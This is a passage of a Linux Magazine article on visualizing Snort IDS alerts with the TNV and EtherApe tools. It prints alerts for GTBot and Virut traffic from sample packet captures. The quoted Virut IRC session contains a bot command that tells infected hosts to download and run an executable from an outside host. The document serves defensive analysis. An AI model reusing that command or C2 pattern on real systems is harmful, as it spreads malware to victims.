Tools for visualizing IDS output

TNV

Platform independent, Java-based TNV [12], or Time-base Network Visualizer, can also consume libpcap-oriented output or capture from a system interface. John Goodall, of vizsec.org, created TNV as part of his graduate work.

You can make use of TNV right from DAVIX's Visualize menu. Notice that remote hosts in the left UI region and a matrix of local hosts on the right can be reordered. I made use of an old GTBot variant to generate gtbot.pcap (Figure 4). Listing 5 shows one of the Snort alerts triggered by the gtbot.pcap file.

Listing 5

Gtbot.cap in Snort

01 [**] [1:100000272:3] COMMUNITY BOT GTBot ver command [**]
02 [Classification: A Network Trojan was detected] [Priority: 1]
03 10/04-18:25:15.656786 84.244.1.30:5050 -> 192.168.1.1:1101
04 TCP TTL:64 TOS:0x0 ID:53296 IpLen:20 DgmLen:348 DF
05 ***AP*** Seq: 0xCA5E0BB6  Ack: 0xB97E3616  Win: 0x16D0  TcpLen: 20

TNV is slow to load larger PCAP files, so patience is required. That said, you'll likely find the results useful.

The Snort alert called out IP address 84.244.1.30 and source port of 5050 connecting to 192.168.1.1 and destination port 1101. These findings are supported in all three TNV views, including ingress port-specific traffic (in the right pane) and 84.244.1.30 connecting to 192.168.1.1 (in the primary pane – exemplified by the thickened connection line and a pop-out box), and the Details for all packets view.

To spot malfeasance in smaller PCAP files, TNV typically offers instant gratification. Don't forget to declare a home network address range that matches the primary IP space found in the PCAP you are analyzing.

EtherApe

EtherApe [13] is yet another DAVIX offering found under the Visualize menu. EtherApe also loads PCAP files directly and, like its compatriot rumint, plays the PCAP back in real-time while displaying the results.

Again utilizing a PCAP sample downloaded from EvilFingers.com, I received the alert in Listing 6 from Snort after it read anon_sid_2000345_2003603.pcap.

Listing 6

Virut.pcap in Snort

01 [**] [1:2003603:3] ET TROJAN W32.Virut.A joining an IRC Channel [**]
02 [Classification: A Network Trojan was detected] [Priority: 1]
03 05/30-23:12:53.343816 210.233.108.48:1048 -> 51.93.245.116:65520
04 TCP TTL:128 TOS:0x0 ID:3686 IpLen:20 DgmLen:67 DF
05 ***AP*** Seq: 0x9A24EA7C  Ack: 0x55A62BF6  Win: 0xFFFF  TcpLen: 20
06 [Xref => http://www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Virut]
07 [Xref => http://doc.emergingthreats.net/2003603][Xref => http://www.bitcrank.net]

I renamed the PCAP file virut.pcap for the W32.Virut.A virus uncovered in the output. W32.Virut.A injects its code into all running processes, opens a backdoor at port 65520 on the compromised machine, and then attempts to connect to IRC servers.

I read virut.pcap with EtherApe and the results are shown in Figure 5. 51.93.245.116 is a compromised host clearly showing the backdoor opened on TCP port 65520. Raw session data from this PCAP as available on EvilFingers also confirms the Snort alert in concert with the visualization:

NICK vouswcmm
USER v020501. . :-Service Pack 2
JOIN &virtu
:* PRIVMSG vouswcmm :!get http://ygyyqtqeyp.hk/dl/loadadv735.exe
PING :i
PONG :i
JOIN &virtu

Conclusion

A more enhanced view of security threats leads to a more capable response. I hope by now you've come to believe that security data visualization is a true partner to Snort IDS output.

Should security data visualization pique your interest, consider contributing to the DAVIX project. In particular, DAVIX leader Jan Monsch has indicated that it would be a great community service for someone to work on tool integration issues in DAVIX/Afterglow. Such an effort would allow for conversion of data formats between different tools and would make DAVIX more accessible for many people. I can attest to this need. Most tools on the DAVIX distribution require varied input, sometimes proprietary in format. CSV-based input for all tools would go a long way to expanding the audience for DAVIX.

The Author

Russ McRee is a senior security analyst, researcher, and founder of holisticinfosec.org, where he advocates a holistic approach to the practice of information assurance. Russ's predominant focuses are incident response and web application security; he does both as part of Microsoft Online Service's Security Incident Management team. Russ speaks and writes frequently regarding infosec topics, including toolsmith, a monthly column for the ISSA Journal. The author wishes to acknowledge the following individuals for their contributions to this article: Raffael Marty, Greg Conti, John Randall, Jan Monsch, Ben Shneiderman, Richard Bejtlich, and Cody Dunne.

Buy this article as PDF

Express-Checkout as PDF
Price $2.95
(incl. VAT)

Buy Linux Magazine

SINGLE ISSUES
 
SUBSCRIPTIONS
 
TABLET & SMARTPHONE APPS
Get it on Google Play

US / Canada

Get it on Google Play

UK / Australia

Related content

  • Intrusion Prevention Intro

    This month we look into the intruder's toolkit and investigate some prudent counter-measures for detecting and preventing attacks.

  • Snort

    Search out hidden attacks with the Snort intrusion detection system.

  • Snort Helpers

    Snort is the de facto standard for open source network intrusion detection. The developer community has kept a fairly low profile for a couple of years, but extensions like Snorby, OpenFPC, and Pulled Pork have given the old hog a new lease on life.

  • Capture File Filtering with Wireshark

    Wireshark doesn’t just work in real time. If you save a history of network activity in a pcap file using a tool such as tcpdump, you can filter the data with Wireshark to search for evidence.

comments powered by Disqus

Direct Download

Read full article as PDF:

Security_Visualization_Tools.pdf (472.97 kB)

News